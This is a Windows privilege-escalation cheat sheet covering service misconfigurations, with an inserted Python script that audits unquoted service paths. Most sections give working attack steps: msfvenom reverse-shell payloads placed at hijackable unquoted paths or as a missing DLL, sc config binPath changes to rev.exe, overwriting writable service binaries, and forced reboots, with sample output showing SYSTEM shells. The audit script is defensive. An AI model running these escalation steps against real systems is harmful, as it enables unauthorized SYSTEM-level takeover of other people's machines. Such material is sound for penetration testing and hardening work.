SERVICE MISCONFIGURATIONS
List all services
See all services — Look for non-default services
sc queryex type= service state= all
Get-Service
wmic service list brief
Example Output
sc queryex type= service state= all | findstr /i "SERVICE_NAME DISPLAY_NAME STATE"
SERVICE_NAME: CustomSvc
DISPLAY_NAME: Custom Application
STATE: 4 RUNNING
(Find non-default services to investigate)
Unquoted service paths
Paths with spaces, no quotes — C:\Program Files\My App\svc.exe = hijack
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows"
Example Output
wmic service get name,pathname | findstr /i /v "C:\Windows"
CustomSvc C:\Program Files\My App\service.exe
Path has spaces + no quotes = hijackable
Place: C:\Program Files\My.exe
Restart service -> runs your exe as SYSTEM
Exploit unquoted path
Windows tries each space-delimited prefix as the executable before the full path — Restart service to trigger
If path: C:\Program Files\My App\service.exe
Place malicious exe at: C:\Program.exe
or: C:\Program Files\My.exe
Example Output
Path: C:\Program Files\My App\service.exe
msfvenom -p windows/x64/shell_reverse_tcp ... -f exe -o 'C:\Program Files\My.exe'
sc stop CustomSvc
sc start CustomSvc
Attacker:
C:\> whoami
nt authority\system
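An added audit check, not part of the original cheat sheet: it parses (constructed) `wmic service get name,pathname` output and, for every unquoted service path containing spaces, lists the intermediate locations Windows would try first, so their ACLs can be verified. The service names and paths in SAMPLE_WMIC are made up.

```python
import re

# Constructed sample of `wmic service get name,pathname` output; not captured
# from a real host.
SAMPLE_WMIC = (
    "Name        PathName\n"
    "CustomSvc   C:\\Program Files\\My App\\service.exe\n"
    "Spooler     C:\\Windows\\System32\\spoolsv.exe\n"
    "GoodSvc     \"C:\\Program Files\\Good Vendor\\good.exe\" -service\n"
    "ArgSvc      C:\\Tools\\agent.exe --config \"C:\\Program Files\\a.cfg\"\n"
)

# Executable part of a command line: everything up to the first ".exe" that
# is followed by whitespace or end of line.
EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)


def parse_wmic(text):
    """Return (name, pathname) pairs from wmic's fixed-width table output."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    col = lines[0].index("PathName")  # offset of the PathName column
    return [(ln[:col].strip(), ln[col:].strip()) for ln in lines[1:]]


def unquoted_path_candidates(pathname):
    """Return the intermediate executables Windows would try before the real
    one when a service path is unquoted and contains spaces; empty list when
    the path is quoted or the .exe name itself has no space before it."""
    if pathname.startswith('"'):
        return []  # quoted: no ambiguity
    m = EXE_RE.match(pathname)
    exe = m.group(1) if m else pathname  # no .exe found: treat whole line as exe
    if " " not in exe:
        return []  # spaces only in the arguments are harmless
    # CreateProcess tries each space-delimited prefix, appending .exe when the
    # prefix has no extension, before finally using the full path.
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit(text):
    """Map service name -> candidate paths for every unquoted-path service.
    Each listed location must not be writable by unprivileged users."""
    findings = {}
    for name, pathname in parse_wmic(text):
        cands = unquoted_path_candidates(pathname)
        if cands:
            findings[name] = cands
    return findings


if __name__ == "__main__":
    for name, cands in audit(SAMPLE_WMIC).items():
        print(f"{name}: unquoted path, verify ACLs on: {', '.join(cands)}")
```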
Weak service permissions
Can you modify service config? — Change binPath to your payload
accesschk.exe -uwcqv * /accepteula
or: sc qc <service_name>
Example Output
accesschk.exe -uwcqv "Everyone" * /accepteula
RW CustomService
SERVICE_ALL_ACCESS
sc config CustomService binPath= "C:\temp\rev.exe"
sc stop CustomService
sc start CustomService
(Shell as SYSTEM)
Modify service binary path
Point service to your payload — Runs as service account (often SYSTEM)
sc config <service> binPath= "C:\temp\rev.exe"
sc stop <service>
sc start <service>
Example Output
sc config CustomSvc binPath= "C:\temp\rev.exe"
[SC] ChangeServiceConfig SUCCESS
sc stop CustomSvc
sc start CustomSvc
Attacker:
C:\> whoami
nt authority\system
Writable service binary
Replace the actual binary — Overwrite with reverse shell
icacls "C:\path\to\service.exe"
Look for: (F) or (M) for your user
Example Output
icacls C:\custom\svc.exe
BUILTIN\Users:(F) <- FULL CONTROL!
copy C:\temp\rev.exe C:\custom\svc.exe /Y
sc stop CustomSvc
sc start CustomSvc
(Your payload runs as SYSTEM)
DLL hijacking (services)
Service loads missing DLL — DLL runs as service user
Process Monitor: filter for NAME NOT FOUND on .dll
Place malicious DLL in search path
Example Output
Process Monitor filter: Result=NAME NOT FOUND, Path ends with .dll
CustomSvc.exe -> C:\custom\missing.dll NOT FOUND
msfvenom -p windows/x64/shell_reverse_tcp ... -f dll -o C:\custom\missing.dll
Restart service -> shell as SYSTEM
Service restart permissions
Need to trigger the service — Some need admin to restart
sc stop <service>
sc start <service>
or reboot if you can
Example Output
sc stop CustomSvc
[SC] Access denied
Try: shutdown /r /t 0
OR wait for scheduled restart
OR: sc config CustomSvc start= auto
(Service restarts after reboot)